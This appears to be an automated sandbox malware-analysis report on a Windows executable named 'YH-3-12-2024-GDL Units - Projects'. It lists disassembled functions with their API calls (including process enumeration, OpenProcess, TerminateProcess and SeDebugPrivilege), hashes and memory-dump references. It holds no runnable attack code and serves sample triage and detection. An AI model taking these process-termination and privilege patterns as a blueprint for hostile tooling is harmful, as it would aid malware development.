                                                        • Instruction ID: 1175a197c9487aa35e5ee5c82cbbcbc893896321c26c5f966f55af46bfed7ff2
                                                        • Opcode Fuzzy Hash: 79de19d1150837414eaa41fd653b453718c88dd57a6b54079417f7e90383c8c0
                                                        • Instruction Fuzzy Hash: 60C1A471A0021A9FDF10DF98D885BAEB7F9FF88314F148469E945EB281E7B09D45CB90
                                                        Function 00839113 Relevance: 12.5, APIs: 5, Strings: 2, Instructions: 263COMMON
                                                        Download Yara Rule
                                                        APIs
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.1668117068.00000000007C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 007C0000, based on PE: true
                                                        • Associated: 00000000.00000002.1668106518.00000000007C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1668153652.000000000084F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1668153652.0000000000874000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1668184050.000000000087E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1668196241.0000000000887000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_7c0000_YH-3-12-2024-GDL Units - Projects.jbxd
                                                        Similarity
                                                        • API ID: Variant$ClearInit$_memset
                                                        • String ID: Incorrect Object type in FOR..IN loop$Null Object assignment in FOR..IN loop
                                                        • API String ID: 2862541840-625585964
                                                        • Opcode ID: c07876c58c8b196e282871919561b38432713cfc1c2fde15455e9967133bb43e
                                                        • Instruction ID: babe61c725ce27c0fe54c8b13900daf168a5f4f1da9638cf91504394ad481473
                                                        • Opcode Fuzzy Hash: c07876c58c8b196e282871919561b38432713cfc1c2fde15455e9967133bb43e
                                                        • Instruction Fuzzy Hash: 5A918A71A00219EBDF24DFA5C848FAFBBB8FF85714F108159E555EB280D7B09945CBA0
                                                        Function 0083975D Relevance: 12.5, APIs: 6, Strings: 1, Instructions: 242COMMON
                                                        Download Yara Rule
                                                        APIs
                                                          • Part of subcall function 0081710A: CLSIDFromProgID.OLE32(?,?,00000000,?,00000000,?,?,-C0000018,00000001,?,00817044,80070057,?,?,?,00817455), ref: 00817127
                                                          • Part of subcall function 0081710A: ProgIDFromCLSID.OLE32(?,00000000,?,?,00000000,?,00000000,?,?,-C0000018,00000001,?,00817044,80070057,?,?), ref: 00817142
                                                          • Part of subcall function 0081710A: lstrcmpiW.KERNEL32(?,00000000,?,?,00000000,?,00000000,?,?,-C0000018,00000001,?,00817044,80070057,?,?), ref: 00817150
                                                          • Part of subcall function 0081710A: CoTaskMemFree.OLE32(00000000,?,00000000,?,?,00000000,?,00000000,?,?,-C0000018,00000001,?,00817044,80070057,?), ref: 00817160
                                                        • CoInitializeSecurity.OLE32(00000000,000000FF,00000000,00000000,00000002,00000003,00000000,00000000,00000000,?,?,?), ref: 00839806
                                                        • _memset.LIBCMT ref: 00839813
                                                        • _memset.LIBCMT ref: 00839956
                                                        • CoCreateInstanceEx.OLE32(?,00000000,00000015,?,00000001,00000000), ref: 00839982
                                                        • CoTaskMemFree.OLE32(?), ref: 0083998D
                                                        Strings
                                                        • NULL Pointer assignment, xrefs: 008399DB
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.1668117068.00000000007C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 007C0000, based on PE: true
                                                        • Associated: 00000000.00000002.1668106518.00000000007C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1668153652.000000000084F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1668153652.0000000000874000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1668184050.000000000087E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1668196241.0000000000887000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_7c0000_YH-3-12-2024-GDL Units - Projects.jbxd
                                                        Similarity
                                                        • API ID: FreeFromProgTask_memset$CreateInitializeInstanceSecuritylstrcmpi
                                                        • String ID: NULL Pointer assignment
                                                        • API String ID: 1300414916-2785691316
                                                        • Opcode ID: c0b3faa79eccb6ecf11e29e1f3babf0225c2bdc8d940ff930cb863aed2aabed7
                                                        • Instruction ID: f64c902eb7c6acabb771263d3adee08ab7bea7bfb11903eae2cc2eb91c57fb67
                                                        • Opcode Fuzzy Hash: c0b3faa79eccb6ecf11e29e1f3babf0225c2bdc8d940ff930cb863aed2aabed7
                                                        • Instruction Fuzzy Hash: 61910571D00229EBDB10DFA5DC45EDEBBB9FF48310F20416AE519A7291DB71AA44CFA0
                                                        Function 00822A96 Relevance: 12.4, APIs: 4, Strings: 3, Instructions: 195windowCOMMON
                                                        Download Yara Rule
                                                        APIs
                                                          • Part of subcall function 007DFC86: _wcscpy.LIBCMT ref: 007DFCA9
                                                        • _memset.LIBCMT ref: 00822B87
                                                        • GetMenuItemInfoW.USER32(?,?,00000000,?), ref: 00822BB6
                                                        • SetMenuItemInfoW.USER32(?,?,00000000,?), ref: 00822C69
                                                        • SetMenuDefaultItem.USER32(?,000000FF,00000000), ref: 00822C97
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.1668117068.00000000007C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 007C0000, based on PE: true
                                                        • Associated: 00000000.00000002.1668106518.00000000007C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1668153652.000000000084F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1668153652.0000000000874000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1668184050.000000000087E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1668196241.0000000000887000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_7c0000_YH-3-12-2024-GDL Units - Projects.jbxd
                                                        Similarity
                                                        • API ID: ItemMenu$Info$Default_memset_wcscpy
                                                        • String ID: (P$(P$0
                                                        • API String ID: 4152858687-3500901666
                                                        • Opcode ID: ae6ba64112bf1c3237b8ca2fa3c5e2f534e77dfcf71837f12174d3190c0a085b
                                                        • Instruction ID: 9f6d68003bffee5fa5bf360ba691b2dbe0852cdcc79e74da650f78271d2ce72f
                                                        • Opcode Fuzzy Hash: ae6ba64112bf1c3237b8ca2fa3c5e2f534e77dfcf71837f12174d3190c0a085b
                                                        • Instruction Fuzzy Hash: 9A51A071608321ABD725EF28E845A6F77E8FF99320F040A2DF895D6291DB74CD84C792
                                                        Function 00846D80 Relevance: 12.4, APIs: 6, Strings: 1, Instructions: 143windowCOMMON
                                                        Download Yara Rule
                                                        APIs
                                                        • SendMessageW.USER32(00000000,00001036,00000010,00000010), ref: 00846E24
                                                        • SendMessageW.USER32(?,00001036,00000000,?), ref: 00846E38
                                                        • SetWindowPos.USER32(?,00000000,00000000,00000000,00000000,00000000,00000013), ref: 00846E52
                                                        • _wcscat.LIBCMT ref: 00846EAD
                                                        • SendMessageW.USER32(?,00001057,00000000,?), ref: 00846EC4
                                                        • SendMessageW.USER32(?,00001061,?,0000000F), ref: 00846EF2
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.1668117068.00000000007C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 007C0000, based on PE: true
                                                        • Associated: 00000000.00000002.1668106518.00000000007C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1668153652.000000000084F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1668153652.0000000000874000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1668184050.000000000087E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1668196241.0000000000887000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_7c0000_YH-3-12-2024-GDL Units - Projects.jbxd
                                                        Similarity
                                                        • API ID: MessageSend$Window_wcscat
                                                        • String ID: SysListView32
                                                        • API String ID: 307300125-78025650
                                                        • Opcode ID: 9db0f5d1cf8cf7dd75d295a76a8837d0de6889ad4f7ee8017efb75f5c4518598
                                                        • Instruction ID: 0b534e9dd5a736a8c39c8403c7ffa73bd141dd0e078337886cc83c54bf6bc798
                                                        • Opcode Fuzzy Hash: 9db0f5d1cf8cf7dd75d295a76a8837d0de6889ad4f7ee8017efb75f5c4518598
                                                        • Instruction Fuzzy Hash: 9341A274A0034CEBEB219F64CC85BEA77E8FF09350F10442AF694E7292E6769D94CB50
                                                        Function 0083E933 Relevance: 12.4, APIs: 6, Strings: 1, Instructions: 136COMMON
                                                        Download Yara Rule
                                                        APIs
                                                          • Part of subcall function 00823C55: CreateToolhelp32Snapshot.KERNEL32 ref: 00823C7A
                                                          • Part of subcall function 00823C55: Process32FirstW.KERNEL32(00000000,?), ref: 00823C88
                                                          • Part of subcall function 00823C55: CloseHandle.KERNEL32(00000000), ref: 00823D52
                                                        • OpenProcess.KERNEL32(00000001,00000000,?), ref: 0083E9A4
                                                        • GetLastError.KERNEL32 ref: 0083E9B7
                                                        • OpenProcess.KERNEL32(00000001,00000000,?), ref: 0083E9E6
                                                        • TerminateProcess.KERNEL32(00000000,00000000), ref: 0083EA63
                                                        • GetLastError.KERNEL32(00000000), ref: 0083EA6E
                                                        • CloseHandle.KERNEL32(00000000), ref: 0083EAA3
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.1668117068.00000000007C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 007C0000, based on PE: true
                                                        • Associated: 00000000.00000002.1668106518.00000000007C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1668153652.000000000084F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1668153652.0000000000874000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1668184050.000000000087E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1668196241.0000000000887000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_7c0000_YH-3-12-2024-GDL Units - Projects.jbxd
                                                        Similarity
                                                        • API ID: Process$CloseErrorHandleLastOpen$CreateFirstProcess32SnapshotTerminateToolhelp32
                                                        • String ID: SeDebugPrivilege
                                                        • API String ID: 2533919879-2896544425
                                                        • Opcode ID: 333ab25a6a051fecc4061e0384365211e264a03d5ea5758731a479a09cfc05ba
                                                        • Instruction ID: efcb64148d8967f54ff54769c928c0103b853e451352519facc58cffdfc5627e
                                                        • Opcode Fuzzy Hash: 333ab25a6a051fecc4061e0384365211e264a03d5ea5758731a479a09cfc05ba
                                                        • Instruction Fuzzy Hash: 38418A31200211DFDB15EF18CCA9FAAB7A5FF91314F04841DFA469B2D2DB79A844CB96
                                                        Function 00847291 Relevance: 12.4, APIs: 5, Strings: 2, Instructions: 103windowCOMMON
                                                        Download Yara Rule
                                                        APIs
                                                        • _memset.LIBCMT ref: 008472AA
                                                        • GetMenuItemInfoW.USER32(?,000000FF,00000000,00000030), ref: 00847351
                                                        • IsMenu.USER32(?), ref: 00847369
                                                        • InsertMenuItemW.USER32(?,?,00000001,00000030), ref: 008473B1
                                                        • DrawMenuBar.USER32 ref: 008473C4
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.1668117068.00000000007C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 007C0000, based on PE: true
                                                        • Associated: 00000000.00000002.1668106518.00000000007C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1668153652.000000000084F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1668153652.0000000000874000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1668184050.000000000087E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1668196241.0000000000887000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_7c0000_YH-3-12-2024-GDL Units - Projects.jbxd
                                                        Similarity
                                                        • API ID: Menu$Item$DrawInfoInsert_memset
                                                        • String ID: 0$0R
                                                        • API String ID: 3866635326-488941688
                                                        • Opcode ID: 4edbfdbbde350ef7c014f338603476460af0be29795c53789d187c983fca5d1f
                                                        • Instruction ID: e58bdddfb371fc72d2f0960db9341399f6e576973ad79cbcdab2f3ade6f0e7f9
                                                        • Opcode Fuzzy Hash: 4edbfdbbde350ef7c014f338603476460af0be29795c53789d187c983fca5d1f
                                                        • Instruction Fuzzy Hash: C7411375A04208EFDB20DF64D884AAABBF8FB09314F548529FD15EB350D730AD50DB60
                                                        Function 00822F94 Relevance: 12.3, APIs: 2, Strings: 5, Instructions: 82windowCOMMON
                                                        Download Yara Rule
                                                        APIs
                                                        • LoadIconW.USER32(00000000,00007F03), ref: 00823033
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.1668117068.00000000007C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 007C0000, based on PE: true
                                                        • Associated: 00000000.00000002.1668106518.00000000007C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1668153652.000000000084F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1668153652.0000000000874000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1668184050.000000000087E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1668196241.0000000000887000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_7c0000_YH-3-12-2024-GDL Units - Projects.jbxd
                                                        Similarity
                                                        • API ID: IconLoad
                                                        • String ID: blank$info$question$stop$warning
                                                        • API String ID: 2457776203-404129466
                                                        • Opcode ID: a56ac71c98e9be54c876d8bbb1822bb14e049bf330d51bcb34d91e74a727d2ef
                                                        • Instruction ID: ebe1d2dcd574e77dc519a9ef8ade9265adff6a2a43b7aba1033dba466dc5634d
                                                        • Opcode Fuzzy Hash: a56ac71c98e9be54c876d8bbb1822bb14e049bf330d51bcb34d91e74a727d2ef
                                                        • Instruction Fuzzy Hash: 831108313887A6FEE7159B15EC5AC6B779CFF19324B10402AF904E6282DA7C9F8055B4
                                                        Function 008242F8 Relevance: 12.3, APIs: 6, Strings: 1, Instructions: 47windowCOMMON
                                                        Download Yara Rule
                                                        APIs
                                                        • GetModuleHandleW.KERNEL32(00000000,?,?,00000100,00000000), ref: 00824312
                                                        • LoadStringW.USER32(00000000), ref: 00824319
                                                        • GetModuleHandleW.KERNEL32(00000000,00001389,?,00000100), ref: 0082432F
                                                        • LoadStringW.USER32(00000000), ref: 00824336
                                                        • _wprintf.LIBCMT ref: 0082435C
                                                        • MessageBoxW.USER32(00000000,?,?,00011010), ref: 0082437A
                                                        Strings
                                                        • %s (%d) : ==> %s: %s %s, xrefs: 00824357
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.1668117068.00000000007C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 007C0000, based on PE: true
                                                        • Associated: 00000000.00000002.1668106518.00000000007C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1668153652.000000000084F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1668153652.0000000000874000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1668184050.000000000087E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1668196241.0000000000887000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_7c0000_YH-3-12-2024-GDL Units - Projects.jbxd
                                                        Similarity
                                                        • API ID: HandleLoadModuleString$Message_wprintf
                                                        • String ID: %s (%d) : ==> %s: %s %s
                                                        • API String ID: 3648134473-3128320259
                                                        • Opcode ID: 502cf417e32ed042e8a69c0944231c42e62fc5f6128aa4a0056f014a6bc98822
                                                        • Instruction ID: 098a9a720713a901835de0e3078ba6b65ff5f9e8ca80f755f5d7f2961555d63f
                                                        • Opcode Fuzzy Hash: 502cf417e32ed042e8a69c0944231c42e62fc5f6128aa4a0056f014a6bc98822
                                                        • Instruction Fuzzy Hash: 42018FF6900218BFE711D7A0DD8DEE7776CFB09301F0001A5BB09E2152EA349E848B70
                                                        Function 007C2A5B Relevance: 12.1, APIs: 8, Instructions: 129COMMON
                                                        Download Yara Rule
                                                        APIs
                                                        • ShowWindow.USER32(FFFFFFFF,?,00000000,00000000,?,007FC1C7,00000004,00000000,00000000,00000000), ref: 007C2ACF
                                                        • ShowWindow.USER32(FFFFFFFF,00000000,00000000,00000000,?,007FC1C7,00000004,00000000,00000000,00000000,000000FF), ref: 007C2B17
                                                        • ShowWindow.USER32(FFFFFFFF,00000006,00000000,00000000,?,007FC1C7,00000004,00000000,00000000,00000000), ref: 007FC21A
                                                        • ShowWindow.USER32(FFFFFFFF,?,00000000,00000000,?,007FC1C7,00000004,00000000,00000000,00000000), ref: 007FC286
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.1668117068.00000000007C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 007C0000, based on PE: true
                                                        • Associated: 00000000.00000002.1668106518.00000000007C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1668153652.000000000084F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1668153652.0000000000874000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1668184050.000000000087E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1668196241.0000000000887000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_7c0000_YH-3-12-2024-GDL Units - Projects.jbxd
                                                        Similarity
                                                        • API ID: ShowWindow
                                                        • String ID:
                                                        • API String ID: 1268545403-0
                                                        • Opcode ID: abe143c8a0ee30ba16d8116303f4772d9148f6c215e9ce2741aba0c4c844c60d
                                                        • Instruction ID: ee0a64d5822525b5016db770dd4597dbda943a2a00a4ca47c1ace0487199048a
                                                        • Opcode Fuzzy Hash: abe143c8a0ee30ba16d8116303f4772d9148f6c215e9ce2741aba0c4c844c60d
                                                        • Instruction Fuzzy Hash: DD41E830604684AADB3A9B288D8CF7F7B92FB46310F14C81DEA47866A3C67D9853D711
                                                        Function 008270C6 Relevance: 12.1, APIs: 8, Instructions: 101fileCOMMON
                                                        Download Yara Rule
                                                        APIs
                                                        • InterlockedExchange.KERNEL32(?,000001F5), ref: 008270DD
                                                          • Part of subcall function 007E0DB6: std::exception::exception.LIBCMT ref: 007E0DEC
                                                          • Part of subcall function 007E0DB6: __CxxThrowException@8.LIBCMT ref: 007E0E01
                                                        • ReadFile.KERNEL32(0000FFFF,00000000,0000FFFF,?,00000000), ref: 00827114
                                                        • EnterCriticalSection.KERNEL32(?), ref: 00827130
                                                        • _memmove.LIBCMT ref: 0082717E
                                                        • _memmove.LIBCMT ref: 0082719B
                                                        • LeaveCriticalSection.KERNEL32(?), ref: 008271AA
                                                        • ReadFile.KERNEL32(0000FFFF,00000000,0000FFFF,00000000,00000000), ref: 008271BF
                                                        • InterlockedExchange.KERNEL32(?,000001F6), ref: 008271DE
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.1668117068.00000000007C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 007C0000, based on PE: true
                                                        • Associated: 00000000.00000002.1668106518.00000000007C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1668153652.000000000084F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1668153652.0000000000874000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1668184050.000000000087E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1668196241.0000000000887000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_7c0000_YH-3-12-2024-GDL Units - Projects.jbxd
                                                        Similarity
                                                        • API ID: CriticalExchangeFileInterlockedReadSection_memmove$EnterException@8LeaveThrowstd::exception::exception
                                                        • String ID:
                                                        • API String ID: 256516436-0
                                                        • Opcode ID: 8b65689fef1845f7ced17982c0ceb09825aea7b33cdffe7ef746f50733c204fd
                                                        • Instruction ID: 594418c872505eb098d82b13375dd23b9f070d5095a2645cc1b9cc295f2911f5
                                                        • Opcode Fuzzy Hash: 8b65689fef1845f7ced17982c0ceb09825aea7b33cdffe7ef746f50733c204fd
                                                        • Instruction Fuzzy Hash: DB316E35900215EBDB00EFA5DC899ABB7B8FF49310F1441B9F904EB256DB749E50CBA0
                                                        Function 008461D3 Relevance: 12.1, APIs: 8, Instructions: 95windowCOMMON
                                                        Download Yara Rule
                                                        APIs
                                                        • DeleteObject.GDI32(00000000), ref: 008461EB
                                                        • GetDC.USER32(00000000), ref: 008461F3
                                                        • GetDeviceCaps.GDI32(00000000,0000005A), ref: 008461FE
                                                        • ReleaseDC.USER32(00000000,00000000), ref: 0084620A
                                                        • CreateFontW.GDI32(?,00000000,00000000,00000000,?,00000000,00000000,00000000,00000001,00000004,00000000,?,00000000,?), ref: 00846246
                                                        • SendMessageW.USER32(?,00000030,00000000,00000001), ref: 00846257
                                                        • MoveWindow.USER32(?,?,?,?,?,00000000,?,?,0084902A,?,?,000000FF,00000000,?,000000FF,?), ref: 00846291
                                                        • SendMessageW.USER32(?,00000142,00000000,00000000), ref: 008462B1
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.1668117068.00000000007C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 007C0000, based on PE: true
                                                        • Associated: 00000000.00000002.1668106518.00000000007C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1668153652.000000000084F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1668153652.0000000000874000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1668184050.000000000087E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1668196241.0000000000887000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_7c0000_YH-3-12-2024-GDL Units - Projects.jbxd
                                                        Similarity
                                                        • API ID: MessageSend$CapsCreateDeleteDeviceFontMoveObjectReleaseWindow
                                                        • String ID:
                                                        • API String ID: 3864802216-0
                                                        • Opcode ID: 17435ddc52f1d3f005503aa7c414b1f710340223244c1ee3c33ae8ae7aa9bdbb
                                                        • Instruction ID: c056be0bed7c0cd084e9388999bad1f615f25d0d1dc0497e7cf68b6ba726a1fa
                                                        • Opcode Fuzzy Hash: 17435ddc52f1d3f005503aa7c414b1f710340223244c1ee3c33ae8ae7aa9bdbb
                                                        • Instruction Fuzzy Hash: 2E318D76201214BFEB118F10CC8AFEB3BA9FF5A765F050065FE08DA192D6B59C51CB60
                                                        Function 0081BBAF Relevance: 12.1, APIs: 8, Instructions: 92COMMON
                                                        Download Yara Rule
                                                        APIs
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.1668117068.00000000007C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 007C0000, based on PE: true
                                                        • Associated: 00000000.00000002.1668106518.00000000007C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1668153652.000000000084F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1668153652.0000000000874000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1668184050.000000000087E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1668196241.0000000000887000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_7c0000_YH-3-12-2024-GDL Units - Projects.jbxd
                                                        Similarity
                                                        • API ID: _memcmp
                                                        • String ID:
                                                        • API String ID: 2931989736-0
                                                        • Opcode ID: 07b8bfecd71b32164d1eceba529289b8412052034c8a7db921a1fe3774397317
                                                        • Instruction ID: 74a5530c9eaad43b6fa7666be4d8c4b80f459551700ac2342337d3ce71b0c8eb
                                                        • Opcode Fuzzy Hash: 07b8bfecd71b32164d1eceba529289b8412052034c8a7db921a1fe3774397317
                                                        • Instruction Fuzzy Hash: 5721AFB260628DBBA60466129D42FFB735DFF1636CB044020FD04DAB83EF28DE5581A1
                                                        Function 0082EB23 Relevance: 10.8, APIs: 5, Strings: 1, Instructions: 323COMMON
                                                        Download Yara Rule
                                                        APIs
                                                          • Part of subcall function 007C9837: __itow.LIBCMT ref: 007C9862
                                                          • Part of subcall function 007C9837: __swprintf.LIBCMT ref: 007C98AC
                                                          • Part of subcall function 007DFC86: _wcscpy.LIBCMT ref: 007DFCA9
                                                        • _wcstok.LIBCMT ref: 0082EC94
                                                        • _wcscpy.LIBCMT ref: 0082ED23
                                                        • _memset.LIBCMT ref: 0082ED56
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.1668117068.00000000007C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 007C0000, based on PE: true
                                                        • Associated: 00000000.00000002.1668106518.00000000007C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1668153652.000000000084F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1668153652.0000000000874000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1668184050.000000000087E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1668196241.0000000000887000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_7c0000_YH-3-12-2024-GDL Units - Projects.jbxd
                                                        Similarity
                                                        • API ID: _wcscpy$__itow__swprintf_memset_wcstok
                                                        • String ID: X
                                                        • API String ID: 774024439-3081909835
                                                        • Opcode ID: 5e72d984f3660a7d8051e33d113c3cdf9448edcb2718ac8e07af0fb7e7ac2564
                                                        • Instruction ID: 1bdc278204ef7db93de178c46637afa30c5dea1b767ea812cbdee3991b5b1fd0
                                                        • Opcode Fuzzy Hash: 5e72d984f3660a7d8051e33d113c3cdf9448edcb2718ac8e07af0fb7e7ac2564
                                                        • Instruction Fuzzy Hash: E9C16A71508251DFC764EF24D889E5AB7E4FF85310F00492DF9999B2A2DB34EC85CB86
                                                        Function 007C1424 Relevance: 10.7, APIs: 7, Instructions: 219COMMON
                                                        Download Yara Rule
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.1668117068.00000000007C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 007C0000, based on PE: true
                                                        • Associated: 00000000.00000002.1668106518.00000000007C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1668153652.000000000084F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1668153652.0000000000874000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1668184050.000000000087E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1668196241.0000000000887000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_7c0000_YH-3-12-2024-GDL Units - Projects.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID:
                                                        • API String ID:
                                                        • Opcode ID: 2a59188042c2bca48ec86abffc2e6557e4527bcac107d554a5c219f168f5b116
                                                        • Instruction ID: cf883f1a318ee39ee80b6fc80363259dd7625413381ddb30293f9614582a9404
                                                        • Opcode Fuzzy Hash: 2a59188042c2bca48ec86abffc2e6557e4527bcac107d554a5c219f168f5b116
                                                        • Instruction Fuzzy Hash: 6A716C34900149EFCB04DF98CC48EBEBB79FF86314F54816DF915AA252C738AA51CBA4
                                                        Function 00836B76 Relevance: 10.7, APIs: 7, Instructions: 212COMMON
                                                        Download Yara Rule
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.1668117068.00000000007C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 007C0000, based on PE: true
                                                        • Associated: 00000000.00000002.1668106518.00000000007C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1668153652.000000000084F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1668153652.0000000000874000.00000002.00000001.01000000.00000003.sdmpDownload File
